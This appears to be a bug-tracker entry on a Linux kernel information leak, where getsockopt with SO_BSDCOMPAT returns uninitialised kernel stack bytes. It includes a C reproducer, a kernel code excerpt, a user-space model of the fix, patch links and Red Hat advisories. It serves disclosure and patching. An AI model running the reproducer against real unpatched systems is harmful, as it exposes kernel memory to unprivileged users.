From Clement Lecigne: In function sock_getsockopt() located in net/core/sock.c, optval v.val is not correctly initialized and directly returned in userland in case we have SO_BSDCOMPAT option set. This dummy code should trigger the bug:

    #include <stdio.h>
    #include <sys/socket.h>
    #include <unistd.h>

    int main(void)
    {
        unsigned char buf[4] = { 0, 0, 0, 0 };
        socklen_t len = sizeof(buf);   /* length must be initialised; the kernel rejects a bogus one */
        int sock;

        sock = socket(33, 2, 2);
        if (sock < 0) { perror("socket"); return 1; }
        if (getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, buf, &len) < 0) {
            perror("getsockopt"); close(sock); return 1;
        }
        /* on an unfixed kernel these four bytes are whatever was left in v.val */
        printf("%02x%02x%02x%02x\n", buf[0], buf[1], buf[2], buf[3]);
        close(sock);
        return 0;
    }

References:
http://lkml.org/lkml/2009/2/11/374
http://lkml.org/lkml/2009/2/12/123
http://patchwork.kernel.org/patch/6816/
Created attachment 332522
Upstream patch
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=df0bca049d01c0ee94afb7cd5dfd959541e6c8da
This is a small infoleak. Do test the return values of socket() and getsockopt() in your testcase. You should be able to see the warning "process 'reproducer' is using obsolete getsockopt SO_BSDCOMPAT" in /var/log/messages.

    sock = socket(2, 2, 0);
    err = getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, &buf, &len);

    SYSCALL_DEFINE5(getsockopt, int, fd, int, level, int, optname,
                    char __user *, optval, int __user *, optlen)
    {
    [...]
            if (level == SOL_SOCKET)
                    err = sock_getsockopt(sock, level, optname, optval, optlen);
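As an added illustration (not code from the bug report or from the kernel), a user-space model of the sock_getsockopt() option switch: the SO_BSDCOMPAT case writes nothing into the union v, yet lv bytes of v are still copied back, and zeroing v before the switch (what the fixed kernel does) closes that path. The names v_slot, prime_stale_stack(), model_getsockopt() and leaks_stale_bytes() are constructed, and the Linux values of SO_TYPE and SO_BSDCOMPAT are assumed.

```c
/* User-space model of the sock_getsockopt() SO_BSDCOMPAT path (illustration,
 * not kernel code): the union v is backed by a static slot so "stale stack
 * contents" can be set deterministically instead of relying on real UB. */
#include <string.h>
#define SO_TYPE_OPT      3    /* SO_TYPE on Linux (assumed value) */
#define SO_BSDCOMPAT_OPT 14   /* SO_BSDCOMPAT on Linux (assumed value) */

/* Stands in for the stack slot sock_getsockopt()'s union v occupies. */
static union { int val; unsigned char raw[sizeof(int)]; } v_slot;

/* Simulate an earlier kernel call leaving data in that slot (constructed). */
void prime_stale_stack(void) { memset(v_slot.raw, 0xAB, sizeof v_slot.raw); }

/* zero_first == 0 follows the unfixed logic: the SO_BSDCOMPAT case never
 * writes v, yet lv bytes of v go back to the caller. zero_first == 1 zeroes
 * v before the switch, as the fixed kernel does. */
int model_getsockopt(int optname, unsigned char *optval, int *optlen, int zero_first)
{
    int lv = sizeof(int);                 /* length for int-valued options */
    if (zero_first)
        memset(&v_slot, 0, sizeof v_slot);
    switch (optname) {
    case SO_TYPE_OPT:
        v_slot.val = 2;                   /* SOCK_DGRAM for the model socket */
        break;
    case SO_BSDCOMPAT_OPT:
        /* sock_warn_obsolete_bsdism("getsockopt"); no assignment to v */
        break;
    default:
        return -1;                        /* kernel: -ENOPROTOOPT */
    }
    if (*optlen < lv)
        return -1;                        /* kernel: -EINVAL */
    memcpy(optval, v_slot.raw, lv);       /* kernel: copy_to_user() */
    *optlen = lv;
    return 0;
}

/* Returns 1 if any byte handed back for SO_BSDCOMPAT is non-zero (stale data
 * reached the caller), 0 if all bytes are zero, -1 on error. */
int leaks_stale_bytes(int zero_first)
{
    unsigned char buf[sizeof(int)];
    int len = sizeof buf, i;
    prime_stale_stack();
    if (model_getsockopt(SO_BSDCOMPAT_OPT, buf, &len, zero_first) != 0)
        return -1;
    for (i = 0; i < len; i++) if (buf[i] != 0) return 1;
    return 0;
}
```

The same check, run against a real kernel with the reproducer above, is what distinguishes an unfixed kernel (arbitrary bytes) from a fixed one (four zero bytes and a returned length of 4).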
net: amend the fix for SO_BSDCOMPAT gsopt infoleak
http://marc.info/?l=linux-kernel&m=123540732700371&w=2
http://marc.info/?l=linux-netdev&m=123543237010175&w=2
(In reply to comment #4)
> net: amend the fix for SO_BSDCOMPAT gsopt infoleak
> http://marc.info/?l=linux-kernel&m=123540732700371&w=2
> http://marc.info/?l=linux-netdev&m=123543237010175&w=2

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=50fee1dec5d71b8a14c1b82f2f42e16adc227f8b
CVSS2 score of low, 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
This issue has been addressed in the following products: MRG for RHEL-5
Via RHSA-2009:0360 https://rhn.redhat.com/errata/RHSA-2009-0360.html
This issue has been addressed in the following products: Red Hat Enterprise Linux 5
Via RHSA-2009:0326 https://rhn.redhat.com/errata/RHSA-2009-0326.html
This issue has been addressed in the following products: Red Hat Enterprise Linux 4
Via RHSA-2009:0459 https://rhn.redhat.com/errata/RHSA-2009-0459.html